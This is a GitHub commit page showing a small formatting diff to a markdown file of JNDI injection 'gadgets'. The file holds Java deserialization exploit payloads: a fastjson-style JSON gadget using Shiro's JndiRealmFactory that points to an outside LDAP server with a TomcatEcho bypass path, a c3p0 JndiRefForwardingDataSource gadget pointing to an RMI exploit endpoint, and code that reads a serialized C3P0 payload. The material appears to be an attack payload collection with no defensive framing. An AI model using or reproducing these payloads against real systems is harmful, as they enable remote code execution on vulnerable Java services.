We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 4f7fb78 commit 7b7ad4fCopy full SHA for 7b7ad4f
1 file changed
jndi-gadgets.md
@@ -1,7 +1,6 @@
1
+```
2
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://1.116.136.120:1600/TomcatBypass/TomcatEcho"],"Realms":[""],"a":"a"}
3
-
4
5
{"object":["com.mchange.v2.c3p0.JndiRefForwardingDataSource",{"jndiName":"rmi://localhost:8088/Exploit", "loginTimeout":0}]}
6
7
InputStream in = new FileInputStream("C3P0.ser");
@@ -31,3 +30,4 @@ public static String bytesToHexString(byte[] bArray, int length) {
31
30
}
32
return sb.toString();
33
0 commit comments